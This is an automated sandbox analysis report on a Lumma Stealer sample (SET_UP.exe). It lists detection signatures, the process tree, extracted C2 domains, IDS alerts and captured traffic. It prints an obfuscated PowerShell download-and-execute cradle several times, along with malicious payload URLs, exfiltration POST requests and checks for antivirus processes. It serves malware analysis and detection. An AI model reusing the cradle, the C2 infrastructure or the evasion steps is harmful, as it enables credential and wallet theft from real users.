Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name: SET_UP.exe
Analysis ID: 1584507
MD5: 7e62abcaf3030a9400fb60b5f2ee2484
SHA1: 464edfd28fe39ebc0d2dae76660b3c6f1a047864
SHA256: 84553c2f4085cc9ed47323ffd1b25bac55e216ba65b9ff45873bf6702da2553e
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SET_UP.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 7E62ABCAF3030A9400FB60B5F2EE2484)
    • powershell.exe (PID: 7800 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp (PID: 7976 cmdline: "C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 7268 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 2332 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5004 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5924 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2924 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5296 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3912 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7300 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7264 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7236 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5796 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5440 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3844 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3452 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3624 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1072 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2284 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 1236 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7744 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cutefingeuker.click", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x52d79:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: SET_UP.exe PID: 7480 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: SET_UP.exe PID: 7480 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems)
Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
Source: Process started, Author: frack113
Source: Process started, Author: Florian Roth (Nextron Systems)
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data (identical for each of the six Sigma matches above):
  Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
  CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
  CommandLine|base64offset|contains: ^
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe"
  ParentImage: C:\Users\user\Desktop\SET_UP.exe
  ParentProcessId: 7480
  ParentProcessName: SET_UP.exe
  ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
  ProcessId: 7800
  ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T18:02:18.829266+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:20.163505+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:21.525493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:22.710941+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:24.878108+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:26.330947+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:27.341178+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:28.299990+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:29.529144+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | TCP
2025-01-05T18:02:30.287392+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 104.21.37.128 | 443 | TCP
2025-01-05T18:02:19.580500+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:20.919112+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:28.770787+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:19.580500+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:20.919112+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | TCP
2025-01-05T18:02:30.643871+0100 | 2008438 | 1 | A Network Trojan was detected | 104.21.37.128 | 443 | 192.168.2.4 | 49758 | TCP
2025-01-05T18:02:27.818132+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP


AV Detection

Source: https://klipvumisui.shop/int_clp_sha.txtf1$m, Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtFmsZr, Avira URL Cloud: Label: malware
Source: https://cegu.shop/u, Avira URL Cloud: Label: malware
Source: https://dfgh.online/invo, Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/Y, Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/L, Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/, Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtk9, Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=hZ, Avira URL Cloud: Label: malware
Source: SET_UP.exe.7480.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cutefingeuker.click", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}
Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe, ReversingLabs: Detection: 73%
Source: SET_UP.exe, Virustotal: Detection: 8%
Source: SET_UP.exe, ReversingLabs: Detection: 18%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 93.0% probability
Source: SET_UP.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: C:\Users\user\Desktop\SET_UP.exe, Code function: 0_2_00498514 FindFirstFileW,GetDriveTypeW,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,0_2_00498514
Source: C:\Users\user\Desktop\SET_UP.exe, Code function: 0_2_004B8FD2 FindFirstFileW,FindClose,0_2_004B8FD2

Networking

Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 188.114.96.3:443
Source: Malware configuration extractor, URLs: abruptyopsn.shop
Source: Malware configuration extractor, URLs: nearycrepso.shop
Source: Malware configuration extractor, URLs: framekgirus.shop
Source: Malware configuration extractor, URLs: tirepublicerj.shop
Source: Malware configuration extractor, URLs: rabidcowse.shop
Source: Malware configuration extractor, URLs: cutefingeuker.click
Source: Malware configuration extractor, URLs: wholersorie.shop
Source: Malware configuration extractor, URLs: cloudewahsj.shop
Source: Malware configuration extractor, URLs: noisycuttej.shop
Source: Joe Sandbox View, IP Address: 104.21.37.128
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, IP Address: 188.114.96.3
Source: Joe Sandbox View, IP Address: 185.161.251.21
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 104.21.37.128:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49758
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 80
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=W6VF34HWOYV
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 18122
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=KOSWQ2L6
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8725
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=ENMNWZ6IBCXER1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20414
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=OWVLA8FA5OYYV1IS08
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 969
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=T5N7UV5S1D0O744WPN5
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1110
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 115
  Host: cutefingeuker.click
Source: global traffic, HTTP traffic detected:
  GET /8574262446/ph.txt HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: cegu.shop
Source: global traffic, HTTP traffic detected:
  GET /int_clp_sha.txt HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: klipvumisui.shop
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
            Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
            Source: global trafficDNS traffic detected: DNS query: cutefingeuker.click
            Source: global trafficDNS traffic detected: DNS query: cegu.shop
            Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cutefingeuker.click
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
